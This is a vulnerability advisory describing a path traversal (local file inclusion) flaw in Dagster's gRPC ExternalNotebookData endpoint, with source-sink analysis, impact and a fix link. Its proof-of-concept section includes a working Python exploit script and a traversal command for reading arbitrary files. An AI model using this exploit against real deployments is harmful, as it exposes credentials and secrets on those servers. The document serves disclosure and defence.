Description
An LFI vulnerability was found in Dagsters gRPC server implementation. It exists in the ExternalNotebookData
endpoint, which is designed to load notebook data for integration with Dagster workflows.
The issue occurs because the get_notebook_data
function performs insufficient path validation, only checking if the file path ends with .ipynb
. An attacker with access to the gRPC server can craft requests that include traversal sequences (../
) to read arbitrary files by appending .ipynb
to any path. The use of os.path.abspath()
in the implementation does not prevent directory traversal attacks.
By default, the gRPC server binds to localhost, limiting remote exploitation. However, in custom deployments where the server is bound to external interfaces or in cloud-based deployments, the vulnerability could allow unauthorized file access.
Source-Sink Analysis
-
Source: The user-controlled input originates from the
notebook_path
field in gRPC requests to theExternalNotebookData
endpoint inserver.py
: -
Processing: The
get_notebook_data
function inimpl.py
performs only a simple extension check: -
Sink: The vulnerability occurs at the
open(os.path.abspath(notebook_path), "rb")
call, which opens files based on user-controlled input with insufficient sanitization.
PoC
- Create a target file to read:
echo "SECRET_DATA_12345" > /tmp/secret.ipynb
- Start the Dagster gRPC server:
dagster api grpc --python-file repository.py --host 0.0.0.0 --port 4266
- Use the following exploit script:
import grpc
import sys
from dagster._grpc.__generated__ import dagster_api_pb2
from dagster._grpc.__generated__ import dagster_api_pb2_grpc
def exploit_lfi(host, port, target_file):
# create a gRPC channel to the server
channel = grpc.insecure_channel(f"{host}:{port}")
# create a stub
stub = dagster_api_pb2_grpc.DagsterApiStub(channel)
if not target_file.endswith(".ipynb"):
target_file = target_file + ".ipynb"
# create the request
request = dagster_api_pb2.ExternalNotebookDataRequest(notebook_path=target_file)
try:
# send the request
response = stub.ExternalNotebookData(request)
# print the response
print(response.content.decode('utf-8', errors='replace'))
return True
except grpc.RpcError as e:
print(f"RPC Error: {e.details()}")
return False
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(1)
HOST = "localhost"
PORT = 4266
target_file = sys.argv[1]
exploit_lfi(HOST, PORT, target_file)
- Run the exploit to read a file using path traversal:
python exploit.py "../../../../tmp/secret"
Impact
The vulnerability allows an attacker with access to the gRPC server to read arbitrary files that the Dagster process has permission to access, as long as the requested path ends with .ipynb
. This could potentially expose:
- Configuration files containing credentials
- API keys and access tokens
- Database connection strings
- Other sensitive information within readable files
The severity is mitigated by several factors:
- By default, the gRPC server only listens on localhost, limiting remote exploitation
- The attacker must have network access to the gRPC port
- The attack is limited to reading files, not writing or executing code
However, in non-default configurations where the gRPC server is exposed to untrusted networks or in multi-tenant environments, this could lead to unauthorized access to sensitive information.
Fix
- https://github.com/dagster-io/dagster/pull/30002